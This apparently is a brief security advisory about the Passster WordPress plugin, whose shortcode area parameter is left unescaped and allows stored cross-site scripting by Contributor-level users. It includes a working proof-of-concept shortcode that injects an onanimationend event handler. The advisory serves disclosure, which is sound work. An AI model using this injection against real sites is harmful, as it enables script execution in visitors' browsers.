The plugin does not escape the area parameter of its shortcode, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.
[passster password="1" area='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS/)//']